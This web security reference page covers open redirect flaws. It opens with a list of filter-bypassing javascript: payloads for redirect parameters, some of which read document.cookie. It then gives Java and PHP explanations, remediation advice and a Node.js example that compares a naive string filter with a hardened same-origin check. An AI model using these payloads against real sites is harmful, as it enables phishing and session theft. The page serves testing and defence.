javascript: payloads for redirect parameters that bypass common filters:

```
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (notice that in JS "//" is a line comment, so a new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL of PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Aalert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
An open redirect vulnerability exists when a web application allows a user to redirect to an external site by manipulating the URL. An attacker can exploit it to send users to malicious websites for phishing or malware distribution, and the link looks trustworthy because it starts with the legitimate domain. To identify open redirects, testers manipulate parameters commonly used for redirection, such as:
- url
- link
- next
- target
By injecting external URLs (and the javascript: variants listed above) into these parameters, testers can determine whether the application is vulnerable to open redirects.
Java
Open Redirect
An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this to send users to malicious websites, phishing pages, or other harmful content.
Example
Consider a vulnerable Java servlet that reads the redirect query parameter and passes it straight to the redirect call. The application blindly redirects users to the URL specified in the redirect parameter without any validation, so an attacker can craft a link like http://vulnerable-website.com/?redirect=http://malicious-website.com to send victims to a harmful website.
Prevention
To prevent open redirect vulnerabilities in Java web applications, validate user-supplied input before using it in a redirect: parse the value as a URL, whitelist the permitted hosts (or allow only same-origin paths), and check the parsed scheme and host rather than matching prefixes or keywords in the raw string, since the payloads at the top of the page exist to defeat such string checks. Where the destination does not need to vary, redirect to a fixed trusted location instead of anything user-controlled:

```java
// Fixed destination: nothing from the request is used to build the target
response.redirect("http://mysafedomain.com");
```
PHP
Open Redirect
An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. This can be abused by an attacker to craft a malicious link that redirects users to a phishing page or a malware download.
Consider a redirect.php script that takes a URL from the url parameter in the query string and redirects the user to it with the header() function (a Location header), without validating it. An attacker can exploit this by crafting a link like http://example.com/redirect.php?url=http://malicious-site.com.
Impact
The impact of an open redirect vulnerability includes phishing attacks, malware distribution, and social engineering attacks. It can be used in combination with other vulnerabilities to further compromise the security of a web application.
Remediation
To prevent open redirect vulnerabilities, always validate user input before using it in a redirect: parse the value and compare its scheme and host against a whitelist of allowed domains, or use a safe redirect method that does not rely on user-controlled input at all. Note that filter_var($url, FILTER_VALIDATE_URL) only checks that the string is syntactically a URL; as the payload list at the top of the page shows, javascript://%0Aalert(1) passes it, so syntactic validation alone is not a defence.
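The payload list at the top of the page and the prevention advice in both the Java and PHP sections come down to one point: a filter that inspects the raw string sees something different from what the browser's URL parser sees. The following is an added example (not code from the original page) written for Node.js, whose URL class implements the same WHATWG parser browsers use. It puts a naive string filter, the browser's interpretation, and a hardened same-origin check side by side over a few of the payloads above plus some constructed ones. The origin https://site.example, the hosts evil.example and site.example.evil.example, and the function names are all assumptions made for the example.

```javascript
// Added example, not code from the original page. It shows why the string
// filters that the javascript: payload list above defeats are unsafe, and what
// a redirect check that survives those payloads looks like. The origin
// "https://site.example" and every payload below are constructed test inputs.

const EXPECTED_ORIGIN = "https://site.example";

// The kind of check the payload list is built to bypass: a "javascript:" word
// filter plus "does the raw string start with a scheme or //". It operates on
// the raw string, so it never sees what the browser will actually do with it.
function naiveIsLocal(raw) {
  return !/javascript:/i.test(raw) &&
         !/^[a-z][a-z0-9+.-]*:/i.test(raw) &&
         !raw.startsWith("//");
}

// How a browser resolves the value once it reaches Location or an href.
// The WHATWG parser deletes ASCII tab and newline anywhere in the input and
// treats "\" like "/" for http(s) URLs, which is exactly what the %09,
// %0d%0a and %5c payloads rely on.
function browserView(value, base = EXPECTED_ORIGIN) {
  try {
    const u = new URL(value, base);
    return { protocol: u.protocol, host: u.host, href: u.href };
  } catch {
    return null; // not a parseable URL: the browser would not navigate
  }
}

// Hardened check: resolve the value against our own origin, then require an
// http(s) scheme and exactly our origin. Everything else gets a fixed fallback.
function safeRedirectTarget(value, fallback = "/") {
  if (typeof value !== "string" || value === "") return fallback;
  let u;
  try {
    u = new URL(value, EXPECTED_ORIGIN);
  } catch {
    return fallback;
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") return fallback;
  if (u.origin !== EXPECTED_ORIGIN) return fallback;
  return u.href;
}

// A request handler receives the query parameter percent-decoded once, so %09
// has already become a real tab and %250A has become the literal text "%0A".
function evaluate(encodedParam) {
  const value = decodeURIComponent(encodedParam);
  return {
    naive: naiveIsLocal(value),       // would a string filter let it through?
    browser: browserView(value),      // where does the browser actually go?
    safe: safeRedirectTarget(value),  // what the hardened check emits
  };
}

// Constructed inputs: the first three are taken from the payload list above,
// the rest are made up for this example.
const PAYLOADS = [
  "java%0d%0ascript%0d%0a:alert(0)",
  "%09Jav%09ascript:alert(document.domain)",
  "javascript://%250Aalert(1)",
  "/%5cevil.example",
  "https://site.example.evil.example/login",
  "/account/settings?tab=1",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const p of PAYLOADS) console.log(p, JSON.stringify(evaluate(p)));
}
```

Running it shows the CRLF and tab payloads passing the word filter while the browser resolves them to a javascript: URL, the double-encoded javascript://%250Aalert(1) being caught by the word filter but surviving as a syntactically valid URL (the property FILTER_VALIDATE_URL checks), and /%5cevil.example passing the "starts with /" test while the browser lands on evil.example. The hardened check returns the fallback for all of those and only emits a full URL for the same-origin path.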